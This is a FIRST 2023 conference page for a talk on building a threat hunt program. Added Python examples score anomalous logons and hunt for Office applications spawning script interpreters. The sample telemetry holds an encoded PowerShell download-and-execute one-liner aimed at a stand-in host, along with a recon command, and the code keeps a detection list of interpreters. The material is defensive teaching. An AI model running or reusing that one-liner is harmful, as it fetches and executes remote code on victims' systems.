FIRST 2023: The 35th annual FIRST conference Fairmont Queen Elizabeth Hotel Montréal, Canada, June 4-9, 2023 |
Conference website | https://www.first.org/conference/2023/conference-overview |
Abstract registration deadline | December 3, 2022 |
Submission deadline | May 9, 2023 |
Building an Effective Threat Hunt Program
Bios
Mark has been working in the cybersecurity industry for 10 years, in positions ranging from analyst with the US Air Force CIRT to helping build a hunt program from the ground up at a major financial institution. He has seen various methods used to organize enterprise-scale SOCs and the challenges that go with them. He currently holds several security certifications, including CISSP, GCIH, and GCFA.
Sandeep has over 16 years of experience in cybersecurity, primarily in the technology sector. He has been working as a Senior Cyber Threat Hunter with Adobe, providing SME-level guidance to the SOC and, most recently, the Hunt team. His expertise includes threat hunting, detection engineering, and security monitoring. He holds several industry-leading certifications, including AWS-ASA, GCFA, GCED, and EnCE, and has been part of the SANS Advisory Board since 2016.
Keywords
Incident Response; Threat Hunting; DFIR; Automation; Team Building; Metrics and Reporting; Threat Hunting Tooling
Abstract (100-150 words)
Over the last few years, an influx of high-profile security incidents across the industry has placed offensive security tactics among the top priorities for corporations seeking to mitigate the risk of attack.
With many companies opting to continue remote and hybrid working environments for their employees, the resulting security risks cannot be ignored or left to chance. An emphasis on developing stronger defensive security tactics, working in tandem with offensive security teams, is essential for identifying the behaviors of potential threats and building stronger barriers against evolving adversaries.
Threat hunting has emerged as a must-have security component for companies: it encompasses identifying patterns of threat behavior and hunting for anomalies and changes in an environment that point to suspicious activity, with the goal of building up defenses before damage can be done.
What makes a successful threat hunting program? The reality is that identifying suspicious activity is not as straightforward as it may seem. It requires a comprehensive approach with proactive, manual detection, constant communication between teams, and an investment in the right people to bring the process to life.
Outline (300-500 words)
Hunt Focuses
- Hunt vision: reduce attacker dwell time, the interval between an adversary's first foothold in the network and identification of the incident.
- We concentrate on the top three tiers of the Pyramid of Pain (Network/Host Artifacts, Tools, TTPs), the indicators that cost an adversary the most to change.
Who makes up a good hunt team?
- Hunting requires a human touch
  - The act of threat hunting cannot be fully automated. Every data set is different and attacker techniques are ever changing, so the human component has to keep evolving with them.
- Threat hunting is not an entry-level position
  - It should be a higher-level position that triage analysts and detection engineers work toward as a next step.
- Skill sets required
  - Log analysis
  - Endpoint and cloud forensics
  - Detection engineering
  - Firm understanding of attack techniques and behaviors
Communication for success
- A successful team must have an efficient way for outside members to interact with it.
- Input of new ideas
  - New ideas can come from anywhere. The more interesting ones come from subject matter experts and analysts (e.g. database engineers, web admins, domain admins, triage staff).
- Dissemination of hunt findings
  - Output of hunt findings for other teams
Automation is also needed
- Process automation: how do we eliminate the overhead and dead time spent closing out a hunt?
  - Automate backlog curation
  - Automate hunt reporting and closure
  - Automate outputs for other teams
- Automation of log analysis: UEBA (User and Entity Behavior Analytics)
  - You cannot catch all the fish in the ocean at once. With some help you can cast a very wide net that processes mass amounts of data and leaves the hunter with the outliers.
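As an added illustration of casting that wide net (example code written for this page, not from the authors or from any UEBA product), the block below learns a per-user baseline of hosts, logon hours and source countries from a training window of constructed logon events, then scores every event in the hunt window by how far it deviates. The events, the 5% rarity cut-off, the feature weights and the alert threshold are all assumptions chosen for illustration; an account with no history at all is surfaced as well, since a "new" identity is itself something a hunter wants to see.

```python
"""
UEBA-style baselining over constructed logon events.

Learn what is normal per user from a training window (hosts, logon hours,
source countries), then score events in the hunt window by how far they
deviate. Added example: the events, feature weights, rarity cut-off and
alert threshold are all assumptions chosen for illustration.
"""
from collections import Counter, defaultdict
from dataclasses import dataclass, field
from datetime import datetime
from typing import Dict, List, Tuple

RARE = 0.05  # a value seen in under 5% of a user's history counts as rare


def constructed_events() -> List[Tuple[str, str, str, str]]:
    """(timestamp, user, host, source_country); constructed, not real telemetry."""
    ev = []
    for day in range(1, 21):  # 20 days of baseline, February 2023
        ev.append((f"2023-02-{day:02d}T0{8 + day % 2}:15:00", "alice", "ws-alice-01", "CA"))
        ev.append((f"2023-02-{day:02d}T10:30:00", "bob", "ws-bob-07", "CA"))
    ev += [  # hunt window, March 2023
        ("2023-03-01T09:02:00", "alice", "ws-alice-01", "CA"),       # routine
        ("2023-03-02T03:14:00", "alice", "srv-fileshare-03", "RO"),  # new host, odd hour, new country
        ("2023-03-02T10:31:00", "bob", "ws-bob-07", "CA"),           # routine
        ("2023-03-02T10:45:00", "bob", "jump-01", "CA"),             # new host only
        ("2023-03-03T22:00:00", "svc-backup", "dc-01", "CA"),        # account with no history
    ]
    return ev


@dataclass
class UserBaseline:
    hosts: Counter = field(default_factory=Counter)
    hours: Counter = field(default_factory=Counter)
    countries: Counter = field(default_factory=Counter)
    total: int = 0

    def rarity(self, counter: Counter, value) -> float:
        """Fraction of this user's history in which `value` was observed."""
        return counter[value] / self.total if self.total else 0.0


def build_baselines(events, cutoff: str) -> Dict[str, UserBaseline]:
    """Per-user baselines from events before `cutoff` (ISO-8601 strings sort lexically)."""
    baselines: Dict[str, UserBaseline] = defaultdict(UserBaseline)
    for ts, user, host, country in events:
        if ts >= cutoff:
            continue
        b = baselines[user]
        b.hosts[host] += 1
        b.hours[datetime.fromisoformat(ts).hour] += 1
        b.countries[country] += 1
        b.total += 1
    return baselines


def score_event(b: UserBaseline, ts: str, host: str, country: str) -> Tuple[int, List[str]]:
    """Additive score; weights are assumptions reflecting how much each deviation matters."""
    score, reasons = 0, []
    if b.rarity(b.hosts, host) < RARE:
        score += 2
        reasons.append(f"host {host} unseen or rare for this user")
    hour = datetime.fromisoformat(ts).hour
    if b.rarity(b.hours, hour) < RARE:
        score += 1
        reasons.append(f"logon hour {hour:02d} outside usual pattern")
    if b.rarity(b.countries, country) < RARE:
        score += 3
        reasons.append(f"source country {country} unseen or rare")
    return score, reasons


def hunt(events, cutoff: str, threshold: int = 3) -> List[dict]:
    """Return events in the hunt window that score at or above `threshold`."""
    baselines = build_baselines(events, cutoff)
    findings = []
    for ts, user, host, country in events:
        if ts < cutoff:
            continue
        if user not in baselines:  # no history at all is itself worth a look
            findings.append({"ts": ts, "user": user, "score": 99,
                             "reasons": ["no baseline for user"]})
            continue
        score, reasons = score_event(baselines[user], ts, host, country)
        if score >= threshold:
            findings.append({"ts": ts, "user": user, "score": score, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in hunt(constructed_events(), "2023-03-01T00:00:00"):
        print(f["ts"], f["user"], f["score"], "; ".join(f["reasons"]))
```

Run as-is it reports two of the five hunt-window events: alice's 03:14 logon to a new host from a new country, and the never-before-seen svc-backup account. Bob's logon to a new jump host scores below the threshold on its own, which is the point of weighting: a single new host is routine, a new host at an odd hour from an unexpected country is not. In a real deployment the baseline window, the rarity cut-off and the weights are the knobs the hunt team tunes against its own false-positive tolerance.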
Stopping adversaries in their tracks
- Rally behind a hypothesis
  - A hypothesis is the driver for a hunt. It revolves around a singular focus on how the adversary is operating in your network.
- Create a clear goal for the program (e.g. reducing the time adversaries spend in the network, reducing the number of high-impact threats).
- Identify the right automated tools.
- Analyze data for anomalies and work cross-team to build new, improved defenses.
- Not all threat hunting campaigns will be equally successful.
  - Create methods so that no hunt closes without some benefit to your security posture.
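To make the procedure above concrete, and to show what hunting at the top tiers of the Pyramid of Pain (the "Hunt Focuses" section) looks like in practice, here is an added example written for this page; it is not the authors' tooling. The hypothesis is that an adversary gains execution on workstations by having an Office application spawn a script interpreter, often PowerShell with an encoded command line. The hunt expresses that hypothesis as a behavioral predicate over process-creation telemetry, so it keys on the parent/child relationship and the command line rather than on a file hash or C2 address that the adversary can change for free. The events, hostnames, users and command lines are constructed; the mapping to ATT&CK T1204.002 (User Execution: Malicious File) and T1059.001 (PowerShell) is mine; and the `-EncodedCommand` decoding relies on powershell.exe accepting any unambiguous prefix of that switch (`-e`, `-ec`, `-enc`, ...), which is why the matcher is prefix-based.

```python
"""
Hypothesis-driven hunt over constructed process-creation events.

Hypothesis: an adversary gains execution on workstations by having an Office
application spawn a script interpreter, often PowerShell with an encoded
command line. The hunt matches on that behaviour (the TTP tier of the
Pyramid of Pain), not on hashes or C2 addresses, so a recompiled dropper or
a new C2 host still surfaces. Added example: all telemetry is constructed.
"""
import base64
import json
from typing import Dict, List, Optional

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}


def _enc(script: str) -> str:
    """Encode a script the way `powershell -EncodedCommand` expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed EDR/Sysmon-style process-creation telemetry, one JSON object per line.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"ts": "2023-03-06T14:02:11Z", "host": "ws-042", "user": "jdoe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + _enc("IEX (New-Object Net.WebClient).DownloadString('http://stage.invalid/a')")},
    {"ts": "2023-03-06T14:05:40Z", "host": "ws-042", "user": "jdoe",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": "chrome.exe --profile-directory=Default"},
    {"ts": "2023-03-06T15:11:03Z", "host": "ws-017", "user": "mlee",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c whoami > "%TEMP%\\w.txt"'},
    {"ts": "2023-03-06T16:00:00Z", "host": "srv-mgmt-01", "user": "SYSTEM",
     "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"},
    {"ts": "2023-03-06T16:22:09Z", "host": "ws-103", "user": "rkim",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": 'wscript.exe "C:\\Users\\rkim\\AppData\\Local\\Temp\\invoice_2231.js"'},
])


def parse_events(text: str) -> List[Dict]:
    """One JSON object per line; blank lines are skipped."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def basename(path: str) -> str:
    """Lower-cased file name, tolerant of either path separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode a PowerShell -EncodedCommand payload if one is present, else None.
    powershell.exe accepts any unambiguous prefix of the switch (-e, -ec, -enc ...),
    so match by prefix rather than on the full switch name."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lstrip("-/").lower()
        if flag and "encodedcommand".startswith(flag):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def hunt(events: List[Dict]) -> List[Dict]:
    """Apply the hypothesis as a behavioural predicate and return the findings."""
    findings = []
    for ev in events:
        parent, child = basename(ev["parent"]), basename(ev["image"])
        if parent in OFFICE_PARENTS and child in INTERPRETERS:
            findings.append({
                "ts": ev["ts"], "host": ev["host"], "user": ev["user"],
                "technique": "T1204.002 -> T1059.001" if child in ("powershell.exe", "pwsh.exe")
                             else "T1204.002",
                "chain": f"{parent} -> {child}",
                "cmdline": ev["cmdline"],
                "decoded": decode_encoded_command(ev["cmdline"]),
            })
    return findings


if __name__ == "__main__":
    for f in hunt(parse_events(SAMPLE_EVENTS)):
        print(f["ts"], f["host"], f["user"], f["chain"], f["decoded"] or f["cmdline"])
```

Run as-is it returns three findings out of five events: Word spawning hidden, encoded PowerShell (with the downloader one-liner decoded for the analyst), Excel spawning cmd.exe, and Outlook launching a script from the user's Temp directory. The svchost-launched inventory script is left alone even though it is PowerShell with `-ExecutionPolicy Bypass`, because the hypothesis is about the parent process, not about PowerShell in general. Each finding is already in the shape the outline asks for: triage and IR get the host, user and decoded command, and detection engineering gets the predicate itself (`parent in OFFICE_PARENTS and child in INTERPRETERS`) as a candidate rule to tune against known-good add-ins, which is how a hunt closes with a benefit even when the hits turn out to be benign.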